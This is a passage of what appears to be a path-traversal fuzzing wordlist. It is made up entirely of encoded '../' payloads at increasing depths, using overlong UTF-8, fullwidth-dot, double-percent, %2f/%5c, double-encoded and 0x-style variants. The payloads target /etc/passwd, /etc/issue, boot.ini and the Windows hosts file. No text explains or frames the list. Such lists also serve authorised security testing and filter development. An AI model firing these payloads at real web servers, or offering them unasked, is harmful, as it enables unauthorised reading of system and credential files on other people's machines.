-%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afissue -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afboot.ini -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afissue -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afboot.ini -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afissue -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afboot.ini -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afissue -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afboot.ini -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afissue -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afboot.ini -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afissue -%uff0e%uff0e%f8%80%80%80%afboot.ini -%uff0e%uff0e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afissue -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afboot.ini -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afissue -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afboot.ini -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afissue -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afboot.ini -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afissue -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afboot.ini -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afissue -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afboot.ini -%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%af%uff0e%uff0e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%32%%65%%32%%65/etc/passwd -%%32%%65%%32%%65/etc/issue -%%32%%65%%32%%65/boot.ini -%%32%%65%%32%%65/windows/system32/drivers/etc/hosts -%%32%%65%%32%%65/%%32%%65%%32%%65/etc/passwd -%%32%%65%%32%%65/%%32%%65%%32%%65/etc/issue -%%32%%65%%32%%65/%%32%%65%%32%%65/boot.ini -%%32%%65%%32%%65/%%32%%65%%32%%65/windows/system32/drivers/etc/hosts -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/passwd -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/issue -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/boot.ini -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/windows/system32/drivers/etc/hosts -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/passwd -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/issue -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/boot.ini -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/windows/system32/drivers/etc/hosts -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/passwd -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/issue -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/boot.ini -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/windows/system32/drivers/etc/hosts -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/passwd -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/etc/issue -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/boot.ini -%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/%%32%%65%%32%%65/windows/system32/drivers/etc/hosts -%%32%%65%%32%%65\etc\passwd -%%32%%65%%32%%65\etc\issue -%%32%%65%%32%%65\boot.ini -%%32%%65%%32%%65\windows\system32\drivers\etc\hosts -%%32%%65%%32%%65\%%32%%65%%32%%65\etc\passwd -%%32%%65%%32%%65\%%32%%65%%32%%65\etc\issue -%%32%%65%%32%%65\%%32%%65%%32%%65\boot.ini -%%32%%65%%32%%65\%%32%%65%%32%%65\windows\system32\drivers\etc\hosts -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\passwd -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\issue -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\boot.ini -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\windows\system32\drivers\etc\hosts -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\passwd -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\issue -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\boot.ini -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\windows\system32\drivers\etc\hosts -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\passwd -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\issue -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\boot.ini -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\windows\system32\drivers\etc\hosts -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\passwd -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\etc\issue -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\boot.ini -%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\%%32%%65%%32%%65\windows\system32\drivers\etc\hosts -%%32%%65%%32%%65%2fetc%2fpasswd -%%32%%65%%32%%65%2fetc%2fissue -%%32%%65%%32%%65%2fboot.ini -%%32%%65%%32%%65%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fpasswd -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fissue -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fboot.ini -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fpasswd -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fissue -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fboot.ini -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fpasswd -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fissue -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fboot.ini -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fpasswd -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fissue -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fboot.ini -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fpasswd -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fetc%2fissue -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fboot.ini -%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2f%%32%%65%%32%%65%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%32%%65%%32%%65%5cetc%5cpasswd -%%32%%65%%32%%65%5cetc%5cissue -%%32%%65%%32%%65%5cboot.ini -%%32%%65%%32%%65%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cpasswd -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cissue -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cboot.ini -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cpasswd -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cissue -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cboot.ini -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cpasswd -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cissue -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cboot.ini -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cpasswd -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cissue -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cboot.ini -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cpasswd -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cetc%5cissue -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cboot.ini -%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5c%%32%%65%%32%%65%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%32%%65%%32%%650x2fetc0x2fpasswd -%%32%%65%%32%%650x2fetc0x2fissue -%%32%%65%%32%%650x2fboot.ini -%%32%%65%%32%%650x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fpasswd -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fissue -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fboot.ini -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fpasswd -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fissue -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fboot.ini -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fpasswd -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fissue -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fboot.ini -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fpasswd -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fissue -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fboot.ini -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fpasswd -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fetc0x2fissue -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fboot.ini -%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%32%%65%%32%%650x5cetc0x5cpasswd -%%32%%65%%32%%650x5cetc0x5cissue -%%32%%65%%32%%650x5cboot.ini -%%32%%65%%32%%650x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cpasswd -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cissue -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cboot.ini -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cpasswd -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cissue -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cboot.ini -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cpasswd -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cissue -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cboot.ini -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cpasswd -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cissue -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cboot.ini -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cpasswd -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cetc0x5cissue -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cboot.ini -%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5c%%32%%65%%32%%650x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%32%%65%%32%%65%252fetc%252fpasswd -%%32%%65%%32%%65%252fetc%252fissue -%%32%%65%%32%%65%252fboot.ini -%%32%%65%%32%%65%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fpasswd -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fissue -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fboot.ini -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fpasswd -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fissue -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fboot.ini -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fpasswd -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fissue -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fboot.ini -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fpasswd -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fissue -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fboot.ini -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fpasswd -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fetc%252fissue -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fboot.ini -%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%32%%65%%32%%65%255cetc%255cpasswd -%%32%%65%%32%%65%255cetc%255cissue -%%32%%65%%32%%65%255cboot.ini -%%32%%65%%32%%65%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%32%%65%%32%%65%255c%%32%%65%%32%%65%255cetc%255cpasswd 